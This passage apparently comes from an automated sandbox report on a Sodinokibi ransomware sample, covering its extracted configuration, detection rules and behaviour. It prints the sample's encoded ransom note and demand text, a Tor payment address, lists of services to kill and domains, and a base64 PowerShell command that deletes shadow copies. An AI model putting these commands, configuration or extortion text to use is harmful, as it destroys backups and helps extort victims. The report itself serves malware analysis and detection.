ZQBzAHMALgAgAFcAZQAgAGEAYgBzAG8AbAB1AHQAZQBsAHkAIABkAG8AIABuAG8AdAAgAGMAYQByAGUAIABhAGIAbwB1AHQAIAB5AG8AdQAgAGEAbgBkACAAeQBvAHUAcgAgAGQAZQBhAGwAcwAsACAAZQB4AGMAZQBwAHQAIABnAGUAdAB0AGkAbgBnACAAYgBlAG4AZQBmAGkAdABzAC4AIABJAGYAIAB3AGUAIABkAG8AIABuAG8AdAAgAGQAbwAgAG8AdQByACAAdwBvAHIAawAgAGEAbgBkACAAbABpAGEAYgBpAGwAaQB0AGkAZQBzACAALQAgAG4AbwBiAG8AZAB5ACAAdwBpAGwAbAAgAG4AbwB0ACAAYwBvAG8AcABlAHIAYQB0AGUAIAB3AGkAdABoACAAdQBzAC4AIABJAHQAcwAgAG4AbwB0ACAAaQBuACAAbwB1AHIAIABpAG4AdABlAHIAZQBzAHQAcwAuAA0ACgBUAG8AIABjAGgAZQBjAGsAIAB0AGgAZQAgAGEAYgBpAGwAaQB0AHkAIABvAGYAIAByAGUAdAB1AHIAbgBpAG4AZwAgAGYAaQBsAGUAcwAsACAAWQBvAHUAIABzAGgAbwB1AGwAZAAgAGcAbwAgAHQAbwAgAG8AdQByACAAdwBlAGIAcwBpAHQAZQAuACAAVABoAGUAcgBlACAAeQBvAHUAIABjAGEAbgAgAGQAZQBjAHIAeQBwAHQAIABvAG4AZQAgAGYAaQBsAGUAIABmAG8AcgAgAGYAcgBlAGUALgAgAFQAaABhAHQAIABpAHMAIABvAHUAcgAgAGcAdQBhAHIAYQBuAHQAZQBlAC4ADQAKAEkAZgAgAHkAbwB1ACAAdwBpAGwAbAAgAG4AbwB0ACAAYwBvAG8AcABlAHIAYQB0AGUAIAB3AGkAdABoACAAbwB1AHIAIABzAGUAcgB2AGkAYwBlACAALQAgAGYAbwByACAAdQBzACwAIABpAHQAcwAgAGQAbwBlAHMAIABuAG8AdAAgAG0AYQB0AHQAZQByAC4AIABCAHUAdAAgAHkAbwB1ACAAdwBpAGwAbAAgAGwAbwBzAGUAIAB5AG8AdQByACAAdABpAG0AZQAgAGEAbgBkACAAZABhAHQAYQAsACAAYwBhAHUAcwBlACAAagB1AHMAdAAgAHcAZQAgAGgAYQB2AGUAIAB0AGgAZQAgAHAAcgBpAHYAYQB0AGUAIABrAGUAeQAuACAASQBuACAAcAByAGEAYwB0AGkAcwBlACAALQAgAHQAaQBtAGUAIABpAHMAIABtAHUAYwBoACAAbQBvAHIAZQAgAHYAYQBsAHUAYQBiAGwAZQAgAHQAaABhAG4AIABtAG8AbgBlAHkALgANAAoADQAKAEkAIABzAHUAZwBnAGUAcwB0ACAAeQBvAHUAIAByAGUAYQBkACAAYQBiAG8AdQB0ACAAdQBzACAAbwBuACAAdABoAGUAIABJAG4AdABlAHIAbgBlAHQALAAgAHcAZQAgAGEAcgBlACAAawBuAG8AdwBuACAAYQBzACAAIgBTAG8AZABpAG4AbwBrAGkAYgBpACAAUgBhAG4AcwBvAG0AdwBhAHIAZQAiAC4AIABGAG8AcgAgAGUAeABhAG0AcABsAGUALAAgAHQAaABpAHMAIABhAHIAdABpAGMAbABlADoADQAKAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGMAbwB2AGUAdwBhAHIAZQAuAGMAbwBtAC8AYgBsAG8AZwAvADIAMAAxADkALwA3AC8AMQA1AC8AcgBhAG4AcwBvAG0AdwBhAHIAZQAtAGEAbQBvAHUAbgB0AHMALQByAGkAcwBlAC0AMwB4AC0AaQBuAC0AcQAyAC0AYQBzAC0AcgB5AHUAawAtAGEAbQBwAC0AcwBvAGQAaQBuAG8AawBpAGIAaQAtAHMAcAByAGUAYQBkAA0ACgBQAGEAeQAgAGEAdAB0AGUAbgB0AGkAbwBuACAAdABvACAAdABoAGEAdAA6AA0ACgAiAEgAbwB3ACAATQB1AGMAaAAgAEQAYQB0AGEAIABJAHMAIABEAGUAYwByAHkAcAB0AGUAZAAgAHcAaQB0AGgAIABhACAAUgBhAG4AcwBvAG0AdwBhAHIAZQAgAEQAZQBjAHIAeQBwAHQAbwByAD8ADQAKAA0ACgBJAG4AIABRADIAIAAyADAAMQA5ACwAIAB2AGkAYwB0AGkAbQBzACAAdwBoAG8AIABwAGEAaQBkACAAZgBvAHIAIABhACAAZABlAGMAcgB5AHAAdABvAHIAIAByAGUAYwBvAHYAZQByAGUAZAAgADkAMgAlACAAbwBmACAAdABoAGUAaQByACAAZQBuAGMAcgB5AHAAdABlAGQAIABkAGEAdABhAC4AIABUAGgAaQBzACAAcwB0AGEAdABpAHMAdABpAGMAIAB2AGEAcgBpAGUAZAAgAGQAcgBhAG0AYQB0AGkAYwBhAGwAbAB5ACAAZABlAHAAZQBuAGQAaQBuAGcAIABvAG4AIAB0AGgAZQAgAHIAYQBuAHMAbwBtAHcAYQByAGUAIAB0AHkAcABlAC4AIAANAAoARgBvAHIAIABlAHgAYQBtAHAAbABlACwAIABSAHkAdQBrACAAcgBhAG4AcwBvAG0AdwBhAHIAZQAgAGgAYQBzACAAYQAgAHIAZQBsAGEAdABpAHYAZQBsAHkAIABsAG8AdwAgAGQAYQB0AGEAIAByAGUAYwBvAHYAZQByAHkAIAByAGEAdABlACwAIABhAHQAIAB+ACAAOAA3ACUALAAgAHcAaABpAGwAZQAgAFMAbwBkAGkAbgBvAGsAaQBiAGkAIAB3AGEAcwAgAGMAbABvAHMAZQAgAHQAbwAgADEAMAAwACUALgAgACIADQAKAA0ACgBOAG8AdwAgAHkAbwB1ACAAaABhAHYAZQAgAGEAIABnAHUAYQByAGEAbgB0AGUAZQAgAHQAaABhAHQAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHIAZQB0AHUAcgBuAGUAZAAgADEAMAAwACAAJQAuAA0ACgANAAoAWwArAF0AIABIAG8AdwAgAHQAbwAgAGcAZQB0ACAAYQBjAGMAZQBzAHMAIABvAG4AIAB3AGUAYgBzAGkAdABlAD8AIABbACsAXQANAAoADQAKAFkAbwB1ACAAaABhAHYAZQAgAHQAdwBvACAAdwBhAHkAcwA6AA0ACgANAAoAMQApACAAWwBSAGUAYwBvAG0AbQBlAG4AZABlAGQAXQAgAFUAcwBpAG4AZwAgAGEAIABUAE8AUgAgAGIAcgBvAHcAcwBlAHIAIQANAAoAIAAgAGEAKQAgAEQAbwB3AG4AbABvAGEAZAAgAGEAbgBkACAAaQBuAHMAdABhAGwAbAAgAFQATwBSACAAYgByAG8AdwBzAGUAcgAgAGYAcgBvAG0AIAB0AGgAaQBzACAAcwBpAHQAZQA6ACAAaAB0AHQAcABzADoALwAvAHQAbwByAHAAcgBvAGoAZQBjAHQALgBvAHIAZwAvAA0ACgAgACAAYgApACAATwBwAGUAbgAgAG8AdQByACAAdwBlAGIAcwBpAHQAZQA6ACAAaAB0AHQAcAA6AC8ALwBhAHAAbABlAGIAegB1ADQANwB3AGcAYQB6AGEAcABkAHEAawBzADYAdgByAGMAdgA2AHoAYwBuAGoAcABwAGsAYgB4AGIAcgA2AHcAawBlAHQAZgA1ADYAbgBmADYAYQBxADIAbgBtAHkAbwB5AGQALgBvAG4AaQBvAG4ALwB7AFUASQBEAH0ADQAKAA0ACgAyACkAIABJAGYAIABUAE8AUgAgAGIAbABvAGMAawBlAGQAIABpAG4AIAB5AG8AdQByACAAYwBvAHUAbgB0AHIAeQAsACAAdAByAHkAIAB0AG8AIAB1AHMAZQAgAFYAUABOACEAIABCAHUAdAAgAHkAbwB1ACAAYwBhAG4AIAB1AHMAZQAgAG8AdQByACAAcwBlAGMAbwBuAGQAYQByAHkAIAB3AGUAYgBzAGkAdABlAC4AIABGAG8AcgAgAHQAaABpAHMAOgANAAoAIAAgAGEAKQAgAE8AcABlAG4AIAB5AG8AdQByACAAYQBuAHkAIABiAHIAbwB3AHMAZQByACAAKABDAGgAcgBvAG0AZQAsACAARgBpAHIAZQBmAG8AeAAsACAATwBwAGUAcgBhACwAIABJAEUALAAgAEUAZABnAGUAKQANAAoAIAAgAGIAKQAgAE8AcABlAG4AIABvAHUAcgAgAHMAZQBjAG8AbgBkAGEAcgB5ACAAdwBlAGIAcwBpAHQAZQA6ACAAaAB0AHQAcAA6AC8ALwBkAGUAYwByAHkAcAB0AG8AcgAuAGMAYwAvAHsAVQBJAEQAfQANAAoADQAKAFcAYQByAG4AaQBuAGcAOgAgAHMAZQBjAG8AbgBkAGEAcgB5ACAAdwBlAGIAcwBpAHQAZQAgAGMAYQBuACAAYgBlACAAYgBsAG8AYwBrAGUAZAAsACAAdABoAGEAdABzACAAdwBoAHkAIABmAGkAcgBzAHQAIAB2AGEAcgBpAGEAbgB0ACAAbQB1AGMAaAAgAGIAZQB0AHQAZQByACAAYQBuAGQAIABtAG8AcgBlACAAYQB2AGEAaQBsAGEAYgBsAGUALgAgAEkAZgAgAHkAbwB1ACAAaABhAHYAZQAgAHAAcgBvAGIAbABlAG0AIAB3AGkAdABoACAAYwBvAG4AbgBlAGMAdAAsACAAdQBzAGUAIABzAHQAcgBpAGMAdABsAHkAIABUAE8AUgAgAHYAZQByAHMAaQBvAG4AIAA4AC4ANQAuADUADQAKAGwAaQBuAGsAIABmAG8AcgAgAGQAbwB3AG4AbABvAGEAZAAgAFQATwBSACAAdgBlAHIAcwBpAG8AbgAgADgALgA1AC4ANQAgAGgAZQByAGUAOgAgAGgAdAB0AHAAcwA6AC8ALwBmAGkAbABlAGgAaQBwAHAAbwAuAGMAbwBtAC8AZABvAHcAbgBsAG8AYQBkAF8AdABvAHIAXwBiAHIAbwB3AHMAZQByAF8AZgBvAHIAXwB3AGkAbgBkAG8AdwBzAC8AIAANAAoADQAKAFcAaABlAG4AIAB5AG8AdQAgAG8AcABlAG4AIABvAHUAcgAgAHcAZQBiAHMAaQB0AGUALAAgAHAAdQB0ACAAdABoAGUAIABmAG8AbABsAG8AdwBpAG4AZwAgAGQAYQB0AGEAIABpAG4AIAB0AGgAZQAgAGkAbgBwAHUAdAAgAGYAbwByAG0AOgANAAoASwBlAHkAOgANAAoADQAKAHsASwBFAFkAfQANAAoADQAKAA0ACgBFAHgAdABlAG4AcwBpAG8AbgAgAG4AYQBtAGUAOgANAAoADQAKAHsARQBYAFQAfQANAAoADQAKAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQAtAC0ALQANAAoADQAKACEAIQAhACAARABBAE4ARwBFAFIAIAAhACEAIQANAAoARABPAE4AVAAgAHQAcgB5ACAAdABvACAAYwBoAGEAbgBnAGUAIABmAGkAbABlAHMAIABiAHkAIAB5AG8AdQByAHMAZQBsAGYALAAgAEQATwBOAFQAIAB1AHMAZQAgAGEAbgB5ACAAdABoAGkAcgBkACAAcABhAHIAdAB5ACAAcwBvAGYAdAB3AGEAcgBlACAAZgBvAHIAIAByAGUAcwB0AG8AcgBpAG4AZwAgAHkAbwB1AHIAIABkAGEAdABhACAAbwByACAAYQBuAHQAaQB2AGkAcgB1AHMAIABzAG8AbAB1AHQAaQBvAG4AcwAgAC0AIABpAHQAcwAgAG0AYQB5ACAAZQBuAHQAYQBpAGwAIABkAGEAbQBnAGUAIABvAGYAIAB0AGgAZQAgAHAAcgBpAHYAYQB0AGUAIABrAGUAeQAgAGEAbgBkACwAIABhAHMAIAByAGUAcwB1AGwAdAAsACAAVABoAGUAIABMAG8AcwBzACAAYQBsAGwAIABkAGEAdABhAC4ADQAKACEAIQAhACAAIQAhACEAIAAhACEAIQANAAoATwBOAEUAIABNAE8AUgBFACAAVABJAE0ARQA6ACAASQB0AHMAIABpAG4AIAB5AG8AdQByACAAaQBuAHQAZQByAGUAcwB0AHMAIAB0AG8AIABnAGUAdAAgAHkAbwB1AHIAIABmAGkAbABlAHMAIABiAGEAYwBrAC4AIABGAHIAbwBtACAAbwB1AHIAIABzAGkAZABlACwAIAB3AGUAIAAoAHQAaABlACAAYgBlAHMAdAAgAHMAcABlAGMAaQBhAGwAaQBzAHQAcwApACAAbQBhAGsAZQAgAGUAdgBlAHIAeQB0AGgAaQBuAGcAIABmAG8AcgAgAHIAZQBzAHQAbwByAGkAbgBnACwAIABiAHUAdAAgAHAAbABlAGEAcwBlACAAcwBoAG8AdQBsAGQAIABuAG8AdAAgAGkAbgB0AGUAcgBmAGUAcgBlAC4ADQAKACEAIQAhACAAIQAhACEAIAAhACEAIQAAAA==", "et": 0, "wipe": false, "wfld": ["backup"], "nname": "{EXT}-readme.txt", "pk": "jButbpNlvoIWVhEICJ6yN2fkJtSPEPAeh/Pbds99MC0=", "net": true, "exp": false, "arn": false}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.431838459.000000000259F000.00000004.00000040.sdmpJoeSecurity_SodinokibiYara detected Sodinokibi RansomwareJoe Security
    00000000.00000003.431690930.000000000259F000.00000004.00000040.sdmpJoeSecurity_SodinokibiYara detected Sodinokibi RansomwareJoe Security
      Process Memory Space: zA1pLzHWuQ.exe PID: 1496JoeSecurity_SodinokibiYara detected Sodinokibi RansomwareJoe Security

        Sigma Overview

        System Summary:

        barindex
        Sigma detected: Delete Shadow Copy Via PowershellShow sources
        Source: Process startedAuthor: Joe Security: Data: Command: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==, CommandLine: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\zA1pLzHWuQ.exe' , ParentImage: C:\Users\user\Desktop\zA1pLzHWuQ.exe, ParentProcessId: 1496, ProcessCommandLine: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==, ProcessId: 1696

        Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Antivirus / Scanner detection for submitted sampleShow sources
        Source: zA1pLzHWuQ.exeAvira: detected
        Found malware configurationShow sources
        Source: zA1pLzHWuQ.exe.1496.0.memstrMalware Configuration Extractor: Sodinokibi {"prc": [], "sub": "4525", "svc": ["sophos", "backup", "sql", "svc$", "mepocs", "veeam", "memtas", "vss"], "wht": {"ext": ["sys", "lnk", "diagcfg", "wpx", "ps1", "dll", "themepack", "drv", "cab", "scr", "icns", "lock", "diagpkg", "spl", "shs", "cpl", "msu", "ldf", "theme", "386", "idx", "deskthemepack", "ics", "msstyles", "msc", "com", "hlp", "mpa", "cmd", "mod", "diagcab", "ani", "rtp", "rom", "nls", "bat", "exe", "nomedia", "cur", "ocx", "msp", "icl", "key", "msi", "hta", "bin", "adv", "prf", "ico"], "fls": ["ntuser.dat", "ntldr", "desktop.ini", "boot.ini", "ntuser.dat.log", "bootsect.bak", "ntuser.ini", "bootfont.bin", "iconcache.db", "thumbs.db", "autorun.inf"], "fld": ["appdata", "$recycle.bin", "google", "windows.old", "perflogs", "$windows.~ws", "windows", "system volume information", "intel", "$windows.~bt", "application data", "msocache", "mozilla", "tor browser", "boot"]}, "img": "LQAtAC0APQA9AD0AIABTAG8AZABpAG4AbwBrAGkAYgBpACAAUgBhAG4AcwBvAG0AdwBhAHIAZQAgAD0APQA9AC0ALQAtAA0ACgANAAoAQQBsAGwAIABvAGYAIAB5AG8AdQByACAAZgBpAGwAZQBzACAAYQByAGUAIABlAG4AYwByAHkAcAB0AGUAZAAhAA0ACgANAAoARgBpAG4AZAAgAHsARQBYAFQAfQAtAHIAZQBhAGQAbQBlAC4AdAB4AHQAIABhAG4AZAAgAGYAbwBsAGwAbwB3ACAAaQBuAHMAdAB1AGMAdABpAG8AbgBzAAAA", "dmn": "jenniferandersonwriter.com;antonmack.de;phantastyk.com;cite4me.org;paradicepacks.com;international-sound-awards.com;videomarketing.pro;kedak.de;ilso.net;smithmediastrategies.com;theapifactory.com;skanah.com;vihannesporssi.fi;anybookreader.de;smale-opticiens.nl;allfortheloveofyou.com;corendonhotels.com;kosterra.com;tanzschule-kieber.de;hairstylesnow.site;winrace.no;idemblogs.com;zimmerei-deboer.de;xn--singlebrsen-vergleich-nec.com;architecturalfiberglass.org;twohourswithlena.wordpress.com;bimnapratica.com;webhostingsrbija.rs;pt-arnold.de;carriagehousesalonvt.com;noixdecocom.fr;evergreen-fishing.com;craftleathermnl.com;backstreetpub.com;trystana.com;ihr-news.jp;cimanchesterescorts.co.uk;dekkinngay.com;pv-design.de;restaurantesszimmer.de;ravensnesthomegoods.com;art2gointerieurprojecten.nl;marchand-sloboda.com;vibethink.net;broseller.com;andersongilmour.co.uk;tinyagency.com;shiftinspiration.com;rebeccarisher.com;triggi.de;pawsuppetlovers.com;bundabergeyeclinic.com.au;commonground-stories.com;ussmontanacommittee.us;coding-marking.com;olejack.ru;starsarecircular.org;katketytaanet.fi;takeflat.com;balticdermatology.lt;sinal.org;purposeadvisorsolutions.com;waywithwords.net;aglend.com.au;punchbaby.com;imaginado.de;hypozentrum.com;victoriousfestival.co.uk;seproc.hn;stupbratt.no;allamatberedare.se;lloydconstruction.com;maratonaclubedeportugal.com;hashkasolutindo.com;eaglemeetstiger.de;otto-bollmann.de;toponlinecasinosuk.co.uk;8449nohate.org;helikoptervluchtnewyork.nl;blewback.com;mymoneyforex.com;agence-referencement-naturel-geneve.net;mezhdu-delom.ru;platformier.com;deoudedorpskernnoordwijk.nl;thomas-hospital.de;kalkulator-oszczednosci.pl;x-ray.ca;rehabilitationcentersinhouston.net;run4study.com;crowd-patch.co.uk;anteniti.com;euro-tren
        Multi AV Scanner detection for submitted fileShow sources
        Source: zA1pLzHWuQ.exeVirustotal: Detection: 68%Perma Link
        Source: zA1pLzHWuQ.exeReversingLabs: Detection: 81%
        Machine Learning detection for sampleShow sources
        Source: zA1pLzHWuQ.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeCode function: 0_2_00B95086 CryptAcquireContextW,CryptGenRandom,0_2_00B95086
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeCode function: 0_2_00B959CD CryptBinaryToStringW,CryptBinaryToStringW,0_2_00B959CD
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeCode function: 0_2_00B9596C CryptStringToBinaryW,CryptStringToBinaryW,0_2_00B9596C
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: z:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: x:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: v:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: t:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: r:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: p:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: n:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: l:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: j:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: h:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: f:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: b:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: y:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: w:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: u:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: s:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: q:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: o:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: m:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: k:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: i:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: g:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: e:Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: c:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile opened: a:Jump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeCode function: 0_2_00B970C1 FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose,0_2_00B970C1

        Networking:

        barindex
        Found Tor onion addressShow sources
        Source: zA1pLzHWuQ.exe, 00000000.00000002.881692866.00000000025A8000.00000004.00000040.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EA8A4E1A755EAA5C
        Source: zA1pLzHWuQ.exe, 00000000.00000003.431707239.00000000025A8000.00000004.00000040.sdmpString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID}
        Source: 356kf7c535-readme.txt196.0.drString found in binary or memory: b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EA8A4E1A755EAA5C
        Source: zA1pLzHWuQ.exe, 00000000.00000003.431707239.00000000025A8000.00000004.00000040.sdmpString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/
        Source: zA1pLzHWuQ.exe, 00000000.00000002.881692866.00000000025A8000.00000004.00000040.sdmp, 356kf7c535-readme.txt196.0.drString found in binary or memory: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/EA8A4E1A755EAA5C
        Source: zA1pLzHWuQ.exe, 00000000.00000003.431707239.00000000025A8000.00000004.00000040.sdmpString found in binary or memory: http://decryptor.cc/
        Source: zA1pLzHWuQ.exe, 00000000.00000002.881692866.00000000025A8000.00000004.00000040.sdmp, 356kf7c535-readme.txt196.0.drString found in binary or memory: http://decryptor.cc/EA8A4E1A755EAA5C
        Source: zA1pLzHWuQ.exe, 00000000.00000002.881692866.00000000025A8000.00000004.00000040.sdmp, 356kf7c535-readme.txt196.0.drString found in binary or memory: https://filehippo.com/download_tor_browser_for_windows/
        Source: zA1pLzHWuQ.exe, 00000000.00000002.881692866.00000000025A8000.00000004.00000040.sdmp, 356kf7c535-readme.txt196.0.drString found in binary or memory: https://torproject.org/
        Source: zA1pLzHWuQ.exe, 00000000.00000003.704743407.00000000025B1000.00000004.00000040.sdmp, 356kf7c535-readme.txt196.0.drString found in binary or memory: https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spre

        Spam, unwanted Advertisements and Ransom Demands:

        barindex
        Found ransom note / readmeShow sources
        Source: C:\356kf7c535-readme.txtDropped file: ---=== Welcome. Again. ===---[+] Whats Happen? [+]Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 356kf7c535.By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).[+] What guarantees? [+]Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.I suggest you read about us on the Internet, we are known as "Sodinokibi Ransomware". For example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadPay attention to that:"How Much Data Is Decrypted with a Ransomware Decryptor?In Q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. This statistic varied dramatically depending on the ransomware type. For example, Ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while Sodinokibi was close to 100%. "Now you have a guaranJump to dropped file
        Yara detected Sodinokibi RansomwareShow sources
        Source: Yara matchFile source: 00000000.00000003.431838459.000000000259F000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000003.431690930.000000000259F000.00000004.00000040.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: zA1pLzHWuQ.exe PID: 1496, type: MEMORY
        Contains functionalty to change the wallpaperShow sources
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeCode function: 0_2_00B9419B GetDC,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetDeviceCaps,MulDiv,CreateFontW,SelectObject,SetBkMode,SetTextColor,GetStockObject,FillRect,SetPixel,DrawTextW,SystemParametersInfoW,DeleteObject,DeleteObject,DeleteDC,ReleaseDC,0_2_00B9419B
        Modifies existing user documents (likely ransomware behavior)Show sources
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile moved: C:\Users\user\Desktop\JSDNGYCOWY.docxJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile deleted: C:\Users\user\Desktop\JSDNGYCOWY.docxJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile moved: C:\Users\user\Desktop\ZBEDCJPBEY.pdfJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile deleted: C:\Users\user\Desktop\ZBEDCJPBEY.pdfJump to behavior
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile moved: C:\Users\user\Desktop\NIKHQAIQAU.xlsxJump to behavior
        Writes a notice file (html or txt) to demand a ransomShow sources
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile dropped: C:\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and insJump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile dropped: C:\Program Files\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and insJump to dropped file
        Source: C:\Users\user\Desktop\zA1pLzHWuQ.exeFile dropped: C:\Program Files (x86)\356kf7c535-readme.txt -> decrypt one file for free. that is our guarantee.if you will not cooperate with our service - for us, its does not matter. but you will lose your time and data, cause just we have the private key. in practise - time is much more valuable than money.i suggest you read about us on the internet, we are known as "sodinokibi ransomware". for example, this article:https://www.coveware.com/blog/2019/7/15/ransomware-amounts-rise-3x-in-q2-as-ryuk-amp-sodinokibi-spreadpay attention to that:"how much data is decrypted with a ransomware decryptor?in q2 2019, victims who paid for a decryptor recovered 92% of their encrypted data. this statistic varied dramatically depending on the ransomware type. for example, ryuk ransomware has a relatively low data recovery rate, at ~ 87%, while sodinokibi was close to 100%. "now you have a guarantee that your files will be returned 100 %.[+] how to get access on website? [+]you have two ways:1) [recommended] using a tor browser! a) download and insJump to dropped file
